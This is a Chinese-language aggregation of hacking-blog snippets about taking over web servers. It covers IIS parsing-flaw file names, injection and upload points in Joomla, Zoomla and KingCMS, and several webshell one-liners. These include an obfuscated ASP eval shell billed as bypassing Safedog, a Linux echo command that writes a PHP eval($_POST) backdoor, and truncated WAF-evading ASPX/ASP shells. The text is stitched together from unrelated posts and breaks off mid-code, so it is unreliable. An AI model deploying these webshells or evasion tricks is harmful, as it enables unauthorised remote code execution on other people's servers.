推荐个扫 webshell后门 webshell木马 一句话的asp程序

功能说明:
1.能查找后缀名为asp,asa,cdx,cer,aspx等木马
  如果目录下文件过多,容易脚本超时。

2.能查找IIS解析漏洞的文件,这些文件不一定是木马,需要手动查看
  比如"D:\WEBROOT\website\hack.asp\a.gif"或
  "D:\WEBROOT\website\hack.asp;.gif"一类的文件能查到

权5站点全站不可写拿webshell方法

看到一个站点,(此处忽略一万字)先爬虫一下。

使用这个工具

发现一个info目录很可疑,打开以后凭借我多年的日站经验、敏锐的观察力、超强的分析力; 断定这是WordPress
此博客程序没有什么好的漏洞,好用的XSS又需要管理员交互
于是使用以下脚本:


Joomla 3.2 – 3.4.4 无限制SQL注入漏洞

看到一个通杀 Joolma 3.2 到 3.4.4 版本的注入漏洞,可获得管理员权限,详细分析见此 Joomla SQL Injection Vulnerability Exploit Results in Full Administrative Access

注入点存在于 /administrator/components/com_contenthistory/models/history.php。原因是 populateState 函数没有对 list.select 进行过滤。

逐浪cms 2.4某处任意文件上传

/Plugins/swfFileUpload/UploadHandler.ashx
有一个全局过滤
1
asp_code.dll
class ZoomlaSecurityCenter

KingCms最新版绕过补丁(版本:9.00.0019)注入6枚

详细说明:

朋友的公司购买了kingcms的授权,最近kingcms官方给我朋友发来了升级包,升级说明当中说已经解决了已知的安全问题,今天再帮朋友测试下。

自从朋友购买,已经经过了9.00.0015,9.00.0016,9.00.0017,现在更新到了9.00.0018,在线升级的话可以升级到9.00.0019了,kingcms服务还不错。9.00.0018的更新时间是2015.07.23,9.00.0019的更新应该是最近几天的事情。见官网http://www.kingcms.com/download/k9/


另类姿势GetShell php大马

过安全狗asp一句话

过安全狗asp一句话

-5kik <%@codepage=65000%>
<%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("5kik")%>

dos命令下写webshell语句

linux:echo -e “<[email protected](\\$_POST[“c”]);?>” > webshell.cc.php 会再同目录下生成webshell.cc.php一句话 密码:c

过各种waf墙aspx一句话

过各种waf墙aspx一句话

<script runat="server" language="JScript">
function exs(str) {
	var q = "u";
	var w = "afe";

过各种waf墙asp一句话

过各种waf墙asp一句话

<%
Function Writesource(str)
	Response.write(str)
End Function
Function cd(ByVal s, ByVal key)
    For i = 1 To